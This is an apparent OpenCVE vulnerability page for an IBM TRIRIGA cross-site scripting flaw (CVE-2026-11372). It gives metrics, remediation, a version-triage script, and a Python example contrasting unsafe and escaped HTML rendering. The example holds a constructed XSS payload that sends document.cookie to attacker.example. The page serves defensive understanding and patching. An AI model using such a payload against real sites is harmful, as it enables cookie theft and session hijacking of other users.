Description
IBM TRIRIGA Application Platform 5.0.2 through 5.0.3 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI, altering the intended functionality and potentially leading to credential disclosure within a trusted session.
Published: 2026-06-22
Score: 5.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

IBM TRIRIGA Application Platform versions 5.0.2 through 5.0.3 contain a cross-site scripting flaw (CWE-79) that permits an authenticated user to inject arbitrary JavaScript into the web interface. Script injected this way runs in the browsers of other users who view the affected page, inside their authenticated sessions, so it can alter page behaviour and potentially disclose credentials or other session-bound data. The CVSS vector (C:L/I:L/A:N) reflects a moderate impact on confidentiality and integrity and none on availability.
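The class of flaw described here, CWE-79, comes down to untrusted text being written into HTML without contextual output encoding. The Python below is an added illustration of the vulnerable pattern beside its hardened form; it is not TRIRIGA code, and the editable field, the template and the attacker payload are all constructed for the example.

```python
import html
from html.parser import HTMLParser

# Constructed attacker input: text an authenticated user can store in a field
# (a display name here) that is later rendered to other users.  The handler
# would ship document.cookie to a host the attacker controls.
MALICIOUS_DISPLAY_NAME = (
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
)


def render_unsafe(display_name):
    """Vulnerable (CWE-79): user-controlled text concatenated straight into HTML."""
    return f"<span class='owner'>{display_name}</span>"


def render_safe(display_name):
    """Hardened: HTML-entity encode for the text-node context before insertion.

    quote=True also encodes ' and " so the same helper is safe inside a quoted
    attribute value; it is still not enough for JavaScript or URL contexts,
    which need their own encoders.
    """
    return f"<span class='owner'>{html.escape(display_name, quote=True)}</span>"


class _TagCollector(HTMLParser):
    """Records every start tag and its attributes as a browser would parse them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def rendered_tags(markup):
    """Return [(tag, {attr: value}), ...] for the given markup."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def has_script_capable_content(markup):
    """True if any tag other than the template's own <span> survives rendering,
    or if any on* event-handler attribute appears on a parsed tag."""
    for tag, attrs in rendered_tags(markup):
        if tag != "span" or any(name.lower().startswith("on") for name in attrs):
            return True
    return False


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = render(MALICIOUS_DISPLAY_NAME)
        print(f"{label:6}: {out}")
        print(f"        tags={rendered_tags(out)} script_capable={has_script_capable_content(out)}")
```

The check parses the rendered markup rather than grepping it: after escaping, the characters `onerror=` are still present as inert text, so a substring match would misreport the safe output. Note also that an HttpOnly flag on the session cookie keeps `document.cookie` from revealing it, but script running in the victim's page can still call the application's own endpoints with the victim's privileges, which is why the fix has to be server-side output encoding rather than cookie flags alone.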

Affected Systems

The affected products are IBM TRIRIGA Application Platform, specifically versions 5.0.2 and 5.0.3. The official fix is delivered in version 5.0.4 GA and later releases.
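A triage check for the range given above, as an added example that is neither IBM's nor OpenCVE's code. It reads the version out of the CPE 2.3 strings this record lists and out of plain inventory labels such as "5.0.4 GA", and reports anything from 5.0.2 up to but not including 5.0.4 as affected. Ignoring non-numeric suffixes like " GA", and treating a 5.0.3.x fix pack as still affected, are conservative assumptions made for the example, not statements from IBM.

```python
import re

# Boundaries taken from the record: 5.0.2 through 5.0.3 affected, fixed in 5.0.4 GA.
AFFECTED_MIN = (5, 0, 2)
FIXED_IN = (5, 0, 4)

_VERSION_RE = re.compile(r"^\s*v?(\d+(?:\.\d+)*)")


def parse_version(label):
    """Map '5.0.3' or '5.0.4 GA' to a tuple of ints for ordered comparison.

    Assumption for this example: anything after the dotted numeric prefix
    (' GA', a build tag) does not change the ordering.
    """
    m = _VERSION_RE.match(label)
    if not m:
        raise ValueError(f"unrecognised version label: {label!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def version_from_cpe(cpe):
    """Return the version component (field 6) of a CPE 2.3 formatted string."""
    fields = cpe.split(":")
    if len(fields) != 13 or fields[:2] != ["cpe", "2.3"]:
        raise ValueError(f"not a CPE 2.3 string: {cpe!r}")
    return fields[5]


def is_affected(label):
    """True when AFFECTED_MIN <= version < FIXED_IN."""
    return AFFECTED_MIN <= parse_version(label) < FIXED_IN


def triage(entries):
    """Classify CPE strings or bare version labels.

    Returns {entry: 'affected' | 'not affected' | 'unknown'}; 'unknown' covers
    CPEs with a wildcard version ('*' or '-') and labels that do not parse.
    """
    verdicts = {}
    for entry in entries:
        try:
            label = version_from_cpe(entry) if entry.startswith("cpe:2.3:") else entry
            verdicts[entry] = "affected" if is_affected(label) else "not affected"
        except ValueError:
            verdicts[entry] = "unknown"
    return verdicts


# The first two CPEs are the ones listed in this record; the remaining entries
# are constructed inventory labels for the example.
SAMPLE_INVENTORY = [
    "cpe:2.3:a:ibm:tririga_application_platform:5.0.2:*:*:*:*:*:*:*",
    "cpe:2.3:a:ibm:tririga_application_platform:5.0.3:*:*:*:*:*:*:*",
    "cpe:2.3:a:ibm:tririga_application_platform:*:*:*:*:*:*:*:*",
    "5.0.3.1",
    "5.0.4 GA",
    "5.0.1",
]

if __name__ == "__main__":
    for entry, verdict in triage(SAMPLE_INVENTORY).items():
        print(f"{verdict:13} {entry}")
```

A wildcard CPE version is reported as unknown rather than silently passed, since a CPE with `*` in the version field says nothing about which build is deployed.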

Risk and Exploitability

The vulnerability carries a CVSS 3.1 base score of 5.4 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N) and is not listed in the CISA KEV catalog; the SSVC assessment recorded in the history below rates exploitation as none observed and the flaw as not automatable, so this is a moderate rather than critical threat. An attacker needs a valid, low-privileged account on the web interface; the JavaScript they embed then executes in the browsers of other users who view the affected page, without further interaction on the victim's part (UI:N) and inside the victim's authenticated session. No EPSS score is available, so the likelihood of exploitation cannot be quantified, but the flaw lends itself to abuse by insiders or through compromised accounts to capture credentials and other session-bound data.

Generated by OpenCVE AI on June 22, 2026 at 16:30 UTC.

Remediation

Vendor Solution

A holistic approach has been implemented to address XSS vulnerabilities across the application as part of IBM TRIRIGA Application Platform 5.0.4 GA. This vulnerability is also part of it. Customers using affected versions of IBM TRIRIGA should upgrade to IBM TRIRIGA Application Platform 5.0.4 GA or a later supported release containing the fix. IBM recommends applying the latest available maintenance to ensure protection against this vulnerability.

References:
https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product[…]GA+Application+Platform&release=5.0.4&platform=All&function=all
https://www.ibm.com/support/fixcentral/swg/selectFixes


OpenCVE Recommended Actions

  • Upgrade IBM TRIRIGA to version 5.0.4 GA or a later maintenance release that contains the fix.
  • Apply the latest available maintenance update immediately after upgrading to ensure all patches are in place.
  • Limit user privileges to the minimum necessary roles to reduce the risk that an authenticated attacker can inject malicious scripts.

Generated by OpenCVE AI on June 22, 2026 at 16:30 UTC.

Advisories

No advisories yet.

History

Mon, 22 Jun 2026 18:30:00 +0000

Type        Values Removed   Values Added
Metrics                      ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Mon, 22 Jun 2026 15:45:00 +0000

Type                  Values Removed   Values Added
Description                            IBM TRIRIGA Application Platform 5.0.2 through 5.0.3 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
Title                                  IBM TRIRIGA Cross-Site Scripting Vulnerability
First Time appeared                    Ibm
                                       Ibm tririga Application Platform
Weaknesses                             CWE-79
CPEs                                   cpe:2.3:a:ibm:tririga_application_platform:5.0.2:*:*:*:*:*:*:*
                                       cpe:2.3:a:ibm:tririga_application_platform:5.0.3:*:*:*:*:*:*:*
Vendors & Products                     Ibm
                                       Ibm tririga Application Platform
References
Metrics                                cvssV3_1: {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: ibm

Published:

Updated: 2026-06-22T15:57:43.139Z

Reserved: 2026-06-05T12:09:50.632Z

Link: CVE-2026-11372

Vulnrichment

Updated: 2026-06-22T15:57:38.741Z

NVD

No data.

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-22T17:45:05Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')